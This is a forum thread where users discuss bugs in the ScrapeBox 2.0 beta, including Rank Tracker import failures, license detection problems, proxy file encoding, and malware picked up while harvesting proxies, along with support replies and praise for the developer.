I filled out a report at the website on this last night. I'll report back here if/when I get a reply.

I have 3 problems with the SB2.0 beta:

Rank Tracker

1. First of all, my old Rank Tracker projects won't import; looking at the files shows that the SB1 projects are zipped and password protected. It would be nice to be able to carry projects over.
2. The Rank Tracker actually doesn't work; it scans the results but doesn't stop when it finds the site and won't list the ranking for it. It just doesn't detect it. Can anyone else confirm?

Also, I have 2 separate licenses, one on my server and one on my desktop. Both are activated and have been working for a long time. I downloaded SB2 on my server and it worked fine, it picked up my license and worked instantly.

On my desktop it doesn't detect the license and doesn't work. SB1 still loads and detects my license perfectly, but not SB2. Is there some trick to make it detect the valid license? I have no idea why it worked automatically on my server but not the desktop. These are 2 completely different licenses. Thanks.

Try to check your firewall. SB V2 is a new exe for the system, and so are addons and plugins of V2. When the firewall block is, you get such issues.

this makes me desperate, i do not what something that has blocking Scrapebox. I have done to whitelisting Scrapebox and allow ScrapeBox for firewall but SB can not start.

btw, here is the answer from support :

The  .sil file shows you have some sort of malware on your machine that's  injecting code in to the request ScrapeBox is going when validating the  license.

  This  has nothing what so ever to do with ScrapeBox, this is something else  on your machine cause this so I'm unable to help any further with the  cause. Scrapebox WILL put Malware, Trojans and virus on Your machine. This has happened for many years!!!

Its not a Scrapebox problem, its your Proxy Sources!! I have got some awful things from Proxy harvesting.

Sometimes it comes through the Proxy itself. You have to research and filter out the bad sources. Took me months to build the source list that I now have!


Always keep a good anti Virus on your machine when Proxy harvesting and testing sources.

Its not a Scrapebox problem, its your Proxy Sources!! I have got some awful things from Proxy harvesting.
Sometimes it comes through the Proxy itself. You have to research and filter out the bad sources. Took me months to build the source list that I now have!
Always keep a good anti Virus on your machine when Proxy harvesting and testing sources.

"We completely rebuilt Scrapebox 2.0 from the ground up, over 1.1 million lines of code, using a different, newer and better compiler. The 1.x projects for Rank Tracker and Scrapebox in general are not compatible. You will need to rebuild the project."

So despite actually displaying an option for importing 1.x tracker projects if your SB2 can't import 1.x tracker projects you are screwed. I sent a polite reply back suggesting perhaps they might disable this so that customers don't expect this to work. Thankfully I don't have too many to recreate.

Of course what really gets my goat is they have the audacity to tout the great new codebase first. As though my impudence nay arrogance in expecting an option that says "Import 1.x" to actually work as advertised is most unwelcome.

I just imported successful SB V1 projects, but also have 2 which do not have locale and with that, cannot be imported AT THIS STAGE of development (note that also RankTracker will be further developed of course).
So AGAIN, if you dont want to anticipate in the beta test, nobody force you to use the free V2 beta.

I think they must have misunderstood what you were asking. Im sure if they put it there that it either works or is intended to work. As soft touch noted its just due to local info it sounds like.

Also the rank tracker just doesn't work at all in 2.x for that matter. It fails to pick up the sites in the rankings and displays just "-"

If your having any problem Email Scrapebox support!! He is a nice guy or women. I have talk to this person many times. He or She will fix the problem and add it to the next update release or possibly the next one after that.

I assume that it could be a she because my receipt from years ago had the name Lynette Webb I think it was. I looked her up, its a women in the UK. So she could be the developer. For some reason I thought the guy was in Florida. Anyway don't care I was just curious a few times.

Please try the latest version of Ranktracker, which should be at this time of posting V2.0.0.6.
I successfully imported lots of older V1 projects.
If ever you cant import a project with this version also, please send me a PM/email me the project, so I can take a look at it.

Also, the new RankTracker is a new executable for your AV/Firewall, so it might get blocked, which result in no ranking.

The new Rank Tracker updates fixed the import problem and the tracker actually works now, so thanks for that. The only problem I still see is that you can't order the columns by clicking on the headers and I don't see where to edit the proxy list. Other than that it seems to work so far.

Hey guys you have to admit that SweetFunny is a very good person and over the years she made our lives in marketing considerably easier,just show some compassion and patience,you can see going from version 1 to version 2 could'nt be super easy,plus over the years she never let us down,i'm not a kiss ass,just a customer who appreciate her quality products and support.give it a little time,you can always use functions temporary from v1 in the mean time.

Yeah, I'm not at all complaining, Scrapebox is by far the best value and most useful in terms of SEO tools by far. I've bought things that were 2x as much and were abandoned over time (hello, Article Marketing Robot). I'm really looking forward to SB2 improving, it's not quite there at a level that I can switch over from 1.x yet but it's getting there.

- Row (xxx) at the harvested urls stays on screen, even when the program is not active.
- Custom harver 'Stop button' doesn't work.

I also noticed that proxies are saved to file in another encoding than in scarpebox 1.x therefore in some software I cannot load them properly.

When you save proxies, you can select the encoding you want, unicode, utf-8 or ansi. The save dialog allow you to select the encoding.
